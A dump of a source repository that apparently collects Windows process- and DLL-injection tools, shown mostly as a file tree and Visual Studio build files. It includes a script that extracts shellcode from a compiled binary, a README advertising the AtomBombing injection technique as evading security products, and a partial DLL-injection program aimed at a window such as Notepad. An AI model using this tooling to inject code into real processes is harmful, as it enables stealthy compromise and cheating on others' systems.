├── AtomBombing ├── AtomBombing.sln ├── AtomBombing │ ├── AtomBombing.vcxproj │ ├── AtomBombing.vcxproj.filters │ └── main.cpp ├── AtomBombingShellcode │ ├── AtomBombingShellcode.vcxproj │ ├── AtomBombingShellcode.vcxproj.filters │ ├── Scripts │ │ └── Post_Link.py │ └── main.c └── README.md ├── BasicInjection └── c.c ├── BlackBone ├── App1 │ ├── App.xaml │ ├── App.xaml.cs │ ├── App1.csproj │ ├── App1_TemporaryKey.pfx │ ├── Assets │ │ ├── LockScreenLogo.scale-200.png │ │ ├── SplashScreen.scale-200.png │ │ ├── Square150x150Logo.scale-200.png │ │ ├── Square44x44Logo.scale-200.png │ │ ├── Square44x44Logo.targetsize-24_altform-unplated.png │ │ ├── StoreLogo.png │ │ └── Wide310x150Logo.scale-200.png │ ├── MainPage.xaml │ ├── MainPage.xaml.cs │ ├── Package.appxmanifest │ ├── Properties │ │ ├── AssemblyInfo.cs │ │ └── Default.rd.xml │ └── obj │ │ ├── ARM │ │ ├── Debug │ │ │ ├── App.g.i.cs │ │ │ ├── CoreCompileInputs.cache │ │ │ ├── MainPage.g.i.cs │ │ │ └── XamlSaveStateFile.xml │ │ └── Release │ │ │ ├── App.g.i.cs │ │ │ ├── CoreCompileInputs.cache │ │ │ ├── MainPage.g.i.cs │ │ │ └── XamlSaveStateFile.xml │ │ ├── App1.csproj.nuget.g.props │ │ ├── App1.csproj.nuget.g.targets │ │ ├── project.assets.json │ │ ├── x64 │ │ ├── Debug │ │ │ ├── App.g.i.cs │ │ │ ├── CoreCompileInputs.cache │ │ │ ├── MainPage.g.i.cs │ │ │ └── XamlSaveStateFile.xml │ │ └── Release │ │ │ ├── App.g.i.cs │ │ │ ├── CoreCompileInputs.cache │ │ │ ├── MainPage.g.i.cs │ │ │ └── XamlSaveStateFile.xml │ │ └── x86 │ │ ├── Debug │ │ ├── App.g.i.cs │ │ ├── CoreCompileInputs.cache │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ ├── MainPage.g.i.cs │ │ └── XamlSaveStateFile.xml │ │ └── Release │ │ ├── App.g.i.cs │ │ ├── CoreCompileInputs.cache │ │ ├── MainPage.g.i.cs │ │ └── XamlSaveStateFile.xml ├── BlackBone.sln ├── appveyor.yml ├── appveyor_drv.yml ├── build │ └── Win32 │ │ └── Debug │ │ ├── BeaEngineCheetah.dll │ │ ├── BlackBone.pdb │ │ ├── TestApp.exe │ │ ├── TestApp.exp │ │ ├── TestApp.lib │ │ └── TestApp.pdb └── contrib │ └── AsmJit │ ├── ApiBegin.h │ ├── ApiEnd.h │ ├── AsmJit.h │ ├── Build.h │ ├── Config.h │ ├── LICENSE.md │ ├── README.md │ ├── base.h │ ├── base │ ├── assembler.cpp │ ├── assembler.h │ ├── codegen.cpp │ ├── codegen.h │ ├── compiler.cpp │ ├── compiler.h │ ├── constpool.cpp │ ├── constpool.h │ ├── containers.cpp │ ├── containers.h │ ├── context.cpp │ ├── context_p.h │ ├── cpuinfo.cpp │ ├── cpuinfo.h │ ├── cputicks.cpp │ ├── cputicks.h │ ├── error.cpp │ ├── error.h │ ├── globals.cpp │ ├── globals.h │ ├── intutil.cpp │ ├── intutil.h │ ├── lock.h │ ├── logger.cpp │ ├── logger.h │ ├── operand.cpp │ ├── operand.h │ ├── runtime.cpp │ ├── runtime.h │ ├── string.cpp │ ├── string.h │ ├── vectypes.h │ ├── vmem.cpp │ ├── vmem.h │ ├── zone.cpp │ └── zone.h │ ├── host.h │ └── x86 │ ├── x86assembler.cpp │ └── x86assembler.h ├── ByteInjector ├── icon.ico ├── injector.cpp ├── injector.h ├── res.rc ├── resource.h ├── system.cpp ├── system.h └── winmain.cpp ├── ImprovedReflectiveDLLInjection ├── LICENSE.txt ├── Readme.md ├── dll │ ├── reflective_dll.sln │ ├── reflective_dll.vcproj │ ├── reflective_dll.vcxproj │ ├── reflective_dll.vcxproj.filters │ └── src │ │ ├── MyFunction.c │ │ ├── ReflectiveDLLInjection.h │ │ ├── ReflectiveDll.c │ │ ├── ReflectiveLoader.c │ │ └── ReflectiveLoader.h ├── hashcalc │ ├── hashcalc.c │ ├── hashcalc.vcxproj │ └── hashcalc.vcxproj.filters ├── inject │ ├── inject.sln │ ├── inject.vcproj │ ├── inject.vcxproj │ ├── inject.vcxproj.filters │ └── src │ │ ├── GetProcAddressR.c │ │ ├── GetProcAddressR.h │ │ ├── Inject.c │ │ ├── LoadLibraryR.c │ │ ├── LoadLibraryR.h │ │ └── ReflectiveDLLInjection.h └── rdi.sln ├── Inject0r ├── injector.cpp ├── injector.h └── main.cpp ├── InjectProc ├── InjectProc - Process Injection Techniques.sln ├── InjectProc │ ├── InjectProc.vcxproj │ ├── InjectProc.vcxproj.filters │ ├── injection.cpp │ ├── injection.h │ ├── main.cpp │ └── test_files │ │ ├── mbox.dll │ │ └── mbox.exe ├── LICENSE └── README.md ├── ManualMapDll ├── inject_darawkMethod.c └── inject_fleepMethod.c ├── README.md ├── Xenos ├── Xenos.sln ├── appveyor.yml ├── ext │ └── blackbone │ │ ├── BlackBone.sln │ │ ├── LICENSE │ │ ├── README.md │ │ ├── Xenos.sln │ │ ├── appveyor.yml │ │ ├── appveyor_drv.yml │ │ ├── contrib │ │ ├── AsmJit │ │ │ ├── ApiBegin.h │ │ │ ├── ApiEnd.h │ │ │ ├── AsmJit.h │ │ │ ├── Build.h │ │ │ ├── Config.h │ │ │ ├── LICENSE.md │ │ │ ├── README.md │ │ │ ├── base.h │ │ │ ├── base │ │ │ │ ├── assembler.cpp │ │ │ │ ├── assembler.h │ │ │ │ ├── codegen.cpp │ │ │ │ ├── codegen.h │ │ │ │ ├── compiler.cpp │ │ │ │ ├── compiler.h │ │ │ │ ├── constpool.cpp │ │ │ │ ├── constpool.h │ │ │ │ ├── containers.cpp │ │ │ │ ├── containers.h │ │ │ │ ├── context.cpp │ │ │ │ ├── context_p.h │ │ │ │ ├── cpuinfo.cpp │ │ │ │ ├── cpuinfo.h │ │ │ │ ├── cputicks.cpp │ │ │ │ ├── cputicks.h │ │ │ │ ├── error.cpp │ │ │ │ ├── error.h │ │ │ │ ├── globals.cpp │ │ │ │ ├── globals.h │ │ │ │ ├── intutil.cpp │ │ │ │ ├── intutil.h │ │ │ │ ├── lock.h │ │ │ │ ├── logger.cpp │ │ │ │ ├── logger.h │ │ │ │ ├── operand.cpp │ │ │ │ ├── operand.h │ │ │ │ ├── runtime.cpp │ │ │ │ ├── runtime.h │ │ │ │ ├── string.cpp │ │ │ │ ├── string.h │ │ │ │ ├── vectypes.h │ │ │ │ ├── vmem.cpp │ │ │ │ ├── vmem.h │ │ │ │ ├── zone.cpp │ │ │ │ └── zone.h │ │ │ ├── host.h │ │ │ ├── x86.h │ │ │ └── x86 │ │ │ │ ├── x86assembler.cpp │ │ │ │ ├── x86assembler.h │ │ │ │ ├── x86compiler.cpp │ │ │ │ ├── x86compiler.h │ │ │ │ ├── x86context.cpp │ │ │ │ ├── x86context_p.h │ │ │ │ ├── x86cpuinfo.cpp │ │ │ │ ├── x86cpuinfo.h │ │ │ │ ├── x86inst.cpp │ │ │ │ ├── x86inst.h │ │ │ │ ├── x86operand.cpp │ │ │ │ ├── x86operand.h │ │ │ │ ├── x86operand_regs.cpp │ │ │ │ ├── x86scheduler.cpp │ │ │ │ └── x86scheduler_p.h │ │ ├── BeaEngine │ │ │ ├── Warning_for_C_coders.txt │ │ │ ├── Win32 │ │ │ │ ├── Dll │ │ │ │ │ ├── BeaEngine.dll │ │ │ │ │ ├── BeaEngine.exp │ │ │ │ │ ├── BeaEngine.lib │ │ │ │ │ ├── BeaEngineCheetah.dll │ │ │ │ │ ├── BeaEngineCheetah.exp │ │ │ │ │ └── BeaEngineCheetah.lib │ │ │ │ └── Lib │ │ │ │ │ ├── BeaEngine.lib │ │ │ │ │ └── BeaEngineCheetah.lib │ │ │ ├── Win64 │ │ │ │ ├── Dll │ │ │ │ │ ├── BeaEngine64.dll │ │ │ │ │ ├── BeaEngine64.exp │ │ │ │ │ ├── BeaEngine64.lib │ │ │ │ │ ├── BeaEngineCheetah64.dll │ │ │ │ │ ├── BeaEngineCheetah64.exp │ │ │ │ │ └── BeaEngineCheetah64.lib │ │ │ │ └── Lib │ │ │ │ │ ├── BeaEngine64.lib │ │ │ │ │ └── BeaEngineCheetah64.lib │ │ │ └── headers │ │ │ │ ├── BeaEngine.h │ │ │ │ └── Includes │ │ │ │ ├── basic_types.h │ │ │ │ └── export.h │ │ ├── Catch │ │ │ ├── LICENSE.txt │ │ │ ├── README.md │ │ │ └── catch.hpp │ │ ├── CorError.h │ │ ├── VersionHelpers.h │ │ ├── cor.h │ │ ├── corhdr.h │ │ ├── gchost.h │ │ ├── ivalidator.h │ │ ├── ivehandler.h │ │ ├── metahost.h │ │ ├── mscoree.h │ │ ├── rewolf-wow64ext │ │ │ ├── README.md │ │ │ ├── doc │ │ │ │ └── wow64ext.txt │ │ │ ├── lgpl-3.0.txt │ │ │ ├── sample │ │ │ │ ├── build.bat │ │ │ │ └── main.cpp │ │ │ └── src │ │ │ │ ├── CMemPtr.h │ │ │ │ ├── internal.h │ │ │ │ ├── resource.h │ │ │ │ ├── wow64ext.cpp │ │ │ │ ├── wow64ext.h │ │ │ │ ├── wow64ext.rc │ │ │ │ ├── wow64ext.sln │ │ │ │ └── wow64ext.vcxproj │ │ ├── winapifamily.h │ │ └── winpackagefamily.h │ │ └── src │ │ ├── BlackBone │ │ ├── Asm │ │ │ ├── AsmFactory.h │ │ │ ├── AsmHelper32.cpp │ │ │ ├── AsmHelper32.h │ │ │ ├── AsmHelper64.cpp │ │ │ ├── AsmHelper64.h │ │ │ ├── AsmStack.hpp │ │ │ ├── AsmVariant.hpp │ │ │ ├── IAsmHelper.h │ │ │ ├── LDasm.c │ │ │ └── LDasm.h │ │ ├── BlackBone.vcxproj │ │ ├── BlackBone.vcxproj.filters │ │ ├── CMakeLists.txt │ │ ├── Config.h │ │ ├── DriverControl │ │ │ ├── DriverControl.cpp │ │ │ └── DriverControl.h │ │ ├── Include │ │ │ ├── ApiSet.h │ │ │ ├── CallResult.h │ │ │ ├── FunctionTypes.h │ │ │ ├── Macro.h │ │ │ ├── NativeEnums.h │ │ │ ├── NativeStructures.h │ │ │ ├── Types.h │ │ │ ├── Win7Specific.h │ │ │ ├── Win8Specific.h │ │ │ ├── WinXPSpecific.h │ │ │ └── Winheaders.h │ │ ├── LocalHook │ │ │ ├── HookHandlerCdecl.h │ │ │ ├── HookHandlerFastcall.h │ │ │ ├── HookHandlerStdcall.h │ │ │ ├── HookHandlerThiscall.h │ │ │ ├── HookHandlers.h │ │ │ ├── LocalHook.hpp │ │ │ ├── LocalHookBase.cpp │ │ │ ├── LocalHookBase.h │ │ │ ├── TraceHook.cpp │ │ │ ├── TraceHook.h │ │ │ └── VTableHook.hpp │ │ ├── ManualMap │ │ │ ├── MExcept.cpp │ │ │ ├── MExcept.h │ │ │ ├── MMap.cpp │ │ │ ├── MMap.h │ │ │ └── Native │ │ │ │ ├── NtLoader.cpp │ │ │ │ └── NtLoader.h │ │ ├── Misc │ │ │ ├── DynImport.h │ │ │ ├── InitOnce.cpp │ │ │ ├── InitOnce.h │ │ │ ├── NameResolve.cpp │ │ │ ├── NameResolve.h │ │ │ ├── PatternLoader.cpp │ │ │ ├── PatternLoader.h │ │ │ ├── Thunk.hpp │ │ │ ├── Trace.hpp │ │ │ ├── Utils.cpp │ │ │ └── Utils.h │ │ ├── PE │ │ │ ├── ImageNET.cpp │ │ │ ├── ImageNET.h │ │ │ ├── PEImage.cpp │ │ │ └── PEImage.h │ │ ├── Patterns │ │ │ ├── PatternSearch.cpp │ │ │ └── PatternSearch.h │ │ ├── Process │ │ │ ├── MemBlock.cpp │ │ │ ├── MemBlock.h │ │ │ ├── MultPtr.hpp │ │ │ ├── Process.cpp │ │ │ ├── Process.h │ │ │ ├── ProcessCore.cpp │ │ │ ├── ProcessCore.h │ │ │ ├── ProcessMemory.cpp │ │ │ ├── ProcessMemory.h │ │ │ ├── ProcessModules.cpp │ │ │ ├── ProcessModules.h │ │ │ ├── RPC │ │ │ │ ├── RemoteContext.hpp │ │ │ │ ├── RemoteExec.cpp │ │ │ │ ├── RemoteExec.h │ │ │ │ ├── RemoteFunction.hpp │ │ │ │ ├── RemoteHook.cpp │ │ │ │ ├── RemoteHook.h │ │ │ │ ├── RemoteLocalHook.cpp │ │ │ │ ├── RemoteLocalHook.h │ │ │ │ ├── RemoteMemory.cpp │ │ │ │ └── RemoteMemory.h │ │ │ └── Threads │ │ │ │ ├── Thread.cpp │ │ │ │ ├── Thread.h │ │ │ │ ├── Threads.cpp │ │ │ │ └── Threads.h │ │ ├── Subsystem │ │ │ ├── NativeSubsystem.cpp │ │ │ ├── NativeSubsystem.h │ │ │ ├── Wow64Subsystem.cpp │ │ │ ├── Wow64Subsystem.h │ │ │ ├── x86Subsystem.cpp │ │ │ └── x86Subsystem.h │ │ └── Win32 │ │ │ └── Debug │ │ │ ├── AsmHelper32.obj │ │ │ ├── AsmHelper64.obj │ │ │ ├── BlackBone.log │ │ │ ├── BlackBone.pdb │ │ │ ├── BlackBone.tlog │ │ │ ├── BlackBone.lastbuildstate │ │ │ ├── CL.command.1.tlog │ │ │ └── CL.read.1.tlog │ │ │ └── assembler.obj │ │ └── CMakeLists.txt └── src │ ├── Button.hpp │ ├── ComboBox.hpp │ ├── Control.hpp │ ├── Dialog.hpp │ ├── DlgModules.cpp │ ├── DlgModules.h │ ├── DlgSettings.cpp │ ├── DlgSettings.h │ ├── DlgWait.cpp │ ├── DlgWait.h │ ├── DriverExtract.h │ ├── DumpHandler.cpp │ ├── DumpHandler.h │ ├── EditBox.hpp │ ├── FileUtil.cpp │ ├── FileUtil.h │ ├── InjectionCore.cpp │ ├── InjectionCore.h │ ├── ListView.hpp │ ├── Log.h │ ├── Main.cpp │ ├── MainDlg.cpp │ ├── MainDlg.h │ ├── Message.hpp │ ├── ProfileMgr.cpp │ ├── ProfileMgr.h │ ├── Routines.cpp │ ├── StatusBar.hpp │ ├── StringUtil.h │ ├── Window.hpp │ ├── Xenos.rc │ ├── Xenos.vcxproj │ ├── Xenos.vcxproj.filters │ ├── alien.ico │ ├── rapidxml │ ├── license.txt │ ├── manual.html │ ├── rapidxml.hpp │ ├── rapidxml_iterators.hpp │ ├── rapidxml_print.hpp │ └── rapidxml_utils.hpp │ ├── rapidxml_wrap.hpp │ ├── resource.h │ ├── stdafx.h │ └── targetver.h ├── injectAllTheThings ├── README.md ├── dllmain │ ├── ReadMe.txt │ ├── dllmain.cpp │ ├── dllmain.vcxproj │ ├── dllmain.vcxproj.filters │ ├── stdafx.cpp │ ├── stdafx.h │ └── targetver.h ├── dllpoc │ ├── dllpoc.cpp │ ├── dllpoc.vcxproj │ └── dllpoc.vcxproj.filters ├── injectAllTheThings.sln ├── injectAllTheThings.v12.suo ├── injectAllTheThings │ ├── GetProcAddressR.c │ ├── GetProcAddressR.h │ ├── LoadLibraryR.c │ ├── LoadLibraryR.h │ ├── ReflectiveDLLInjection.h │ ├── auxiliary.cpp │ ├── auxiliary.h │ ├── fheaders.h │ ├── injectAllTheThings.vcxproj │ ├── injectAllTheThings.vcxproj.filters │ ├── main.cpp │ ├── t_CreateRemoteThread.cpp │ ├── t_NtCreateThreadEx.cpp │ ├── t_QueueUserAPC.cpp │ ├── t_ReflectiveDllInjection.cpp │ ├── t_RtlCreateUserThread.cpp │ ├── t_SetWindowsHookEx.cpp │ └── t_suspendInjectResume.cpp └── rdll │ ├── LICENSE.txt │ ├── ReadMe.txt │ ├── ReflectiveDLLInjection.h │ ├── ReflectiveLoader.c │ ├── ReflectiveLoader.h │ ├── dllmain.cpp │ ├── rdll.vcxproj │ ├── rdll.vcxproj.filters │ ├── stdafx.cpp │ ├── stdafx.h │ └── targetver.h ├── ncloader ├── LICENSE ├── README.md ├── Release │ └── ncloader.exe ├── ncloader.c ├── ncloader.sln ├── ncloader.vcxproj └── x64 │ └── Release │ └── ncloader.exe ├── pyInjector └── pyInjector │ ├── README.txt │ ├── pyinjector.py │ └── shellcode_generate.py ├── pyPE_inject_obfuscate ├── pyPE_injection.py └── pyPE_mutation.py └── syringe ├── LICENSE ├── README.md ├── source ├── syringe.c ├── syringe.vcxproj ├── syringe_core.c └── syringe_core.h └── syringe.sln /AtomBombing/AtomBombing.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2013 4 | VisualStudioVersion = 12.0.40629.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AtomBombing", "AtomBombing\AtomBombing.vcxproj", "{D303FA55-CFF8-4484-888A-F06B21559014}" 7 | ProjectSection(ProjectDependencies) = postProject 8 | {DAD3D2B2-372F-4486-91FA-032CC0AA1133} = {DAD3D2B2-372F-4486-91FA-032CC0AA1133} 9 | EndProjectSection 10 | EndProject 11 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AtomBombingShellcode", "AtomBombingShellcode\AtomBombingShellcode.vcxproj", "{DAD3D2B2-372F-4486-91FA-032CC0AA1133}" 12 | EndProject 13 | Global 14 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 15 | Debug|Win32 = Debug|Win32 16 | Release|Win32 = Release|Win32 17 | EndGlobalSection 18 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 19 | {D303FA55-CFF8-4484-888A-F06B21559014}.Debug|Win32.ActiveCfg = Release|Win32 20 | {D303FA55-CFF8-4484-888A-F06B21559014}.Debug|Win32.Build.0 = Release|Win32 21 | {D303FA55-CFF8-4484-888A-F06B21559014}.Release|Win32.ActiveCfg = Release|Win32 22 | {D303FA55-CFF8-4484-888A-F06B21559014}.Release|Win32.Build.0 = Release|Win32 23 | {DAD3D2B2-372F-4486-91FA-032CC0AA1133}.Debug|Win32.ActiveCfg = Release|Win32 24 | {DAD3D2B2-372F-4486-91FA-032CC0AA1133}.Debug|Win32.Build.0 = Release|Win32 25 | {DAD3D2B2-372F-4486-91FA-032CC0AA1133}.Release|Win32.ActiveCfg = Release|Win32 26 | {DAD3D2B2-372F-4486-91FA-032CC0AA1133}.Release|Win32.Build.0 = Release|Win32 27 | EndGlobalSection 28 | GlobalSection(SolutionProperties) = preSolution 29 | HideSolutionNode = FALSE 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /AtomBombing/AtomBombing/AtomBombing.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /AtomBombing/AtomBombingShellcode/AtomBombingShellcode.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /AtomBombing/AtomBombingShellcode/Scripts/Post_Link.py: -------------------------------------------------------------------------------- 1 | import pefile 2 | import sys 3 | import os 4 | 5 | DUMMY_FUNC = "\x55\x8b\xec\x51\xc7\x45\xfc\xbe\xba\xad\xde\x8b\xe5\x5d\xc3" 6 | 7 | def main(): 8 | exe_path = sys.argv[1] 9 | pe = pefile.PE(exe_path) 10 | print "Starting!" 11 | output = "" 12 | text_section = "" 13 | for section in pe.sections: 14 | if ".text" in section.Name: 15 | print (section.Name, hex(section.VirtualAddress), hex(section.Misc_VirtualSize), section.SizeOfRawData ) 16 | text_section = pe.get_data(section.VirtualAddress, section.SizeOfRawData) 17 | binary_shellcode = text_section[:text_section.find(DUMMY_FUNC)] 18 | for byte in binary_shellcode: 19 | output += "\\x%x" % ord(byte) 20 | output = "#define SHELLCODE (\"%s\")" % output 21 | folder, file_name = os.path.split(exe_path) 22 | base, _ = os.path.splitext(file_name) 23 | print os.path.join(folder, base+".h") 24 | open(os.path.join(folder, base) + ".h", "wb").write(output) 25 | open(os.path.join(folder, base) + ".text", "wb").write(text_section) 26 | open(os.path.join(folder, base) + ".shellcode", "wb").write(binary_shellcode) 27 | 28 | 29 | 30 | if __name__ == "__main__": 31 | main() -------------------------------------------------------------------------------- /AtomBombing/README.md: -------------------------------------------------------------------------------- 1 | # atom-bombing 2 | Here’s a new code injection technique, dubbed AtomBombing, which exploits Windows atom tables and Async Procedure Calls (APC). Currently, this technique goes undetected by common security solutions that focus on preventing infiltration. 3 | -------------------------------------------------------------------------------- /BasicInjection/c.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | using namespace::std; 5 | 6 | int Inject(HWND hwnd, char *name); 7 | 8 | int main() 9 | { 10 | char dll[]="c:/tt.dll";//change the name to your dll 11 | HWND hw=0; 12 | 13 | 14 | hw = FindWindow("Notepad",NULL);//change the "Notepad" to your window name 15 | 16 | if(!hw) 17 | { 18 | cout<<"Unable find window"< 7 | 8 | 9 | -------------------------------------------------------------------------------- /BlackBone/App1/App1_TemporaryKey.pfx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/BlackBone/App1/App1_TemporaryKey.pfx -------------------------------------------------------------------------------- /BlackBone/App1/Assets/LockScreenLogo.scale-200.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/BlackBone/App1/Assets/LockScreenLogo.scale-200.png -------------------------------------------------------------------------------- /BlackBone/App1/Assets/SplashScreen.scale-200.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/BlackBone/App1/Assets/SplashScreen.scale-200.png -------------------------------------------------------------------------------- /BlackBone/App1/Assets/Square150x150Logo.scale-200.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/BlackBone/App1/Assets/Square150x150Logo.scale-200.png -------------------------------------------------------------------------------- /BlackBone/App1/Assets/Square44x44Logo.scale-200.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/BlackBone/App1/Assets/Square44x44Logo.scale-200.png -------------------------------------------------------------------------------- /BlackBone/App1/Assets/Square44x44Logo.targetsize-24_altform-unplated.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/BlackBone/App1/Assets/Square44x44Logo.targetsize-24_altform-unplated.png -------------------------------------------------------------------------------- /BlackBone/App1/Assets/StoreLogo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/BlackBone/App1/Assets/StoreLogo.png -------------------------------------------------------------------------------- /BlackBone/App1/Assets/Wide310x150Logo.scale-200.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/BlackBone/App1/Assets/Wide310x150Logo.scale-200.png -------------------------------------------------------------------------------- /BlackBone/App1/MainPage.xaml: -------------------------------------------------------------------------------- 1 |  9 | 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /BlackBone/App1/MainPage.xaml.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.IO; 4 | using System.Linq; 5 | using System.Runtime.InteropServices.WindowsRuntime; 6 | using Windows.Foundation; 7 | using Windows.Foundation.Collections; 8 | using Windows.UI.Xaml; 9 | using Windows.UI.Xaml.Controls; 10 | using Windows.UI.Xaml.Controls.Primitives; 11 | using Windows.UI.Xaml.Data; 12 | using Windows.UI.Xaml.Input; 13 | using Windows.UI.Xaml.Media; 14 | using Windows.UI.Xaml.Navigation; 15 | 16 | // The Blank Page item template is documented at https://go.microsoft.com/fwlink/?LinkId=402352&clcid=0x409 17 | 18 | namespace App1 19 | { 20 | /// 21 | /// An empty page that can be used on its own or navigated to within a Frame. 22 | /// 23 | public sealed partial class MainPage : Page 24 | { 25 | public MainPage() 26 | { 27 | this.InitializeComponent(); 28 | } 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /BlackBone/App1/Package.appxmanifest: -------------------------------------------------------------------------------- 1 |  2 | 3 | 8 | 9 | 13 | 14 | 15 | 16 | 17 | App1 18 | rmt01 19 | Assets\StoreLogo.png 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 34 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | -------------------------------------------------------------------------------- /BlackBone/App1/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("App1")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("App1")] 13 | [assembly: AssemblyCopyright("Copyright © 2017")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Version information for an assembly consists of the following four values: 18 | // 19 | // Major Version 20 | // Minor Version 21 | // Build Number 22 | // Revision 23 | // 24 | // You can specify all the values or you can default the Build and Revision Numbers 25 | // by using the '*' as shown below: 26 | // [assembly: AssemblyVersion("1.0.*")] 27 | [assembly: AssemblyVersion("1.0.0.0")] 28 | [assembly: AssemblyFileVersion("1.0.0.0")] 29 | [assembly: ComVisible(false)] -------------------------------------------------------------------------------- /BlackBone/App1/Properties/Default.rd.xml: -------------------------------------------------------------------------------- 1 | 17 | 18 | 19 | 20 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | -------------------------------------------------------------------------------- /BlackBone/App1/obj/ARM/Debug/App.g.i.cs: -------------------------------------------------------------------------------- 1 | #pragma checksum "C:\Users\rmt01\Dropbox\WindowsBox\Kodning\Fusk\Injector\C++\Xenos-master\BlackBone\App1\App.xaml" "{406ea660-64cf-4c82-b6f0-42d48172a799}" "A57A6474CE005A5AD1777F980C75F16B" 2 | //------------------------------------------------------------------------------ 3 | // 4 | // This code was generated by a tool. 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | 12 | namespace App1 13 | { 14 | #if !DISABLE_XAML_GENERATED_MAIN 15 | /// 16 | /// Program class 17 | /// 18 | public static class Program 19 | { 20 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.Windows.UI.Xaml.Build.Tasks"," 14.0.0.0")] 21 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 22 | static void Main(string[] args) 23 | { 24 | global::Windows.UI.Xaml.Application.Start((p) => new App()); 25 | } 26 | } 27 | #endif 28 | 29 | partial class App : global::Windows.UI.Xaml.Application 30 | { 31 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.Windows.UI.Xaml.Build.Tasks"," 14.0.0.0")] 32 | private bool _contentLoaded; 33 | /// 34 | /// InitializeComponent() 35 | /// 36 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.Windows.UI.Xaml.Build.Tasks"," 14.0.0.0")] 37 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 38 | public void InitializeComponent() 39 | { 40 | if (_contentLoaded) 41 | return; 42 | 43 | _contentLoaded = true; 44 | #if DEBUG && !DISABLE_XAML_GENERATED_BINDING_DEBUG_OUTPUT 45 | DebugSettings.BindingFailed += (sender, args) => 46 | { 47 | global::System.Diagnostics.Debug.WriteLine(args.Message); 48 | }; 49 | #endif 50 | #if DEBUG && !DISABLE_XAML_GENERATED_BREAK_ON_UNHANDLED_EXCEPTION 51 | UnhandledException += (sender, e) => 52 | { 53 | if (global::System.Diagnostics.Debugger.IsAttached) global::System.Diagnostics.Debugger.Break(); 54 | }; 55 | #endif 56 | } 57 | } 58 | } 59 | 60 | -------------------------------------------------------------------------------- /BlackBone/App1/obj/ARM/Debug/CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 12772a67ae00809fb157191d07985bcd5a3c942e 2 | -------------------------------------------------------------------------------- /BlackBone/App1/obj/ARM/Debug/MainPage.g.i.cs: -------------------------------------------------------------------------------- 1 | #pragma checksum 